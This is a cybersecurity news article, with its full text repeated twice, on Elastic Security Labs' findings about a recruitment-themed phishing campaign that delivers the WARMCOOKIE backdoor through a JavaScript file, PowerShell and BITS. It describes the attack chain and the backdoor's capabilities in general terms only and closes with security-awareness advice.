How long have you been unable to find a job? This is the fault of cybercriminals!
Cybersecurity researchers from Elastic Security Labs revealed details of an active phishing campaign that uses employment topics to distribute malware called WARMCOOKIE.
"Each WARMCOOKIE sample is compiled with a hard-coded IP address and RC4 key," says Daniel Stepanik, an analyst at Elastic Security Labs. This malware is capable of scanning infected machines, taking screenshots, and downloading other malware.
Since the end of April and to this day, experts have observed a large-scale malicious operation that uses emails on behalf of large recruitment companies such as Hays, Michael Page and PageGroup. Researchers track the activity of intruders under the identifier REF6127.
The attack begins with an offer to a potential candidate to click on the link in the email to get acquainted with a suitable vacancy. After the transition, you need to solve the captcha to load the desired document. As a result, a JavaScript file is uploaded to the victim's computer with the name "Update_23_04_2024_5689382.js".
"This hidden script runs PowerShell, which initiates the WARMCOOKIE download," Elastic explains. To load the malware, the PowerShell script uses the Windows Background Intelligent Transfer Service (BITS).
A key element of the malicious campaign is the use of compromised infrastructure to host the initial phishing URL, which redirects victims to the desired page.
WARMCOOKIE, as a Windows DLL, goes through a two-step process to establish persistence in the system through a scheduled task and run basic functions, first performing anti-analysis to bypass detection.
WARMCOOKIE attack scheme
The backdoor is designed to collect extensive information about the infected host. It supports commands for reading and writing files, executing commands via CMD, getting a list of installed apps, and taking screenshots.
"WARMCOOKIE is a newly discovered malware that is gaining popularity and is being used in various malware campaigns around the world," Elastic says.
The topic of job search and hiring often becomes an excuse for hackers to spread malware. So, just yesterday we talked about the malicious campaign "More_eggs", in which attackers targeted recruiters.
The direct responsibility of recruiters is to find suitable candidates and invite them to an interview. However, as part of their normal work activities, one of these specialists may well launch a clever hacker into the corporate network, and not even realize that he did it.
That is why increasing the information security awareness of all employees, as well as the use of advanced security systems, is the key to a high level of cybersecurity in any enterprise.
Cybersecurity researchers from Elastic Security Labs revealed details of an active phishing campaign that uses employment topics to distribute malware called WARMCOOKIE.
"Each WARMCOOKIE sample is compiled with a hard-coded IP address and RC4 key," says Daniel Stepanik, an analyst at Elastic Security Labs. This malware is capable of scanning infected machines, taking screenshots, and downloading other malware.
Since the end of April and to this day, experts have observed a large-scale malicious operation that uses emails on behalf of large recruitment companies such as Hays, Michael Page and PageGroup. Researchers track the activity of intruders under the identifier REF6127.
The attack begins with an offer to a potential candidate to click on the link in the email to get acquainted with a suitable vacancy. After the transition, you need to solve the captcha to load the desired document. As a result, a JavaScript file is uploaded to the victim's computer with the name "Update_23_04_2024_5689382.js".
"This hidden script runs PowerShell, which initiates the WARMCOOKIE download," Elastic explains. To load the malware, the PowerShell script uses the Windows Background Intelligent Transfer Service (BITS).
A key element of the malicious campaign is the use of compromised infrastructure to host the initial phishing URL, which redirects victims to the desired page.
WARMCOOKIE, as a Windows DLL, goes through a two-step process to establish persistence in the system through a scheduled task and run basic functions, first performing anti-analysis to bypass detection.
WARMCOOKIE attack scheme
The backdoor is designed to collect extensive information about the infected host. It supports commands for reading and writing files, executing commands via CMD, getting a list of installed apps, and taking screenshots.
"WARMCOOKIE is a newly discovered malware that is gaining popularity and is being used in various malware campaigns around the world," Elastic says.
The topic of job search and hiring often becomes an excuse for hackers to spread malware. So, just yesterday we talked about the malicious campaign "More_eggs", in which attackers targeted recruiters.
The direct responsibility of recruiters is to find suitable candidates and invite them to an interview. However, as part of their normal work activities, one of these specialists may well launch a clever hacker into the corporate network, and not even realize that he did it.
That is why increasing the information security awareness of all employees, as well as the use of advanced security systems, is the key to a high level of cybersecurity in any enterprise.
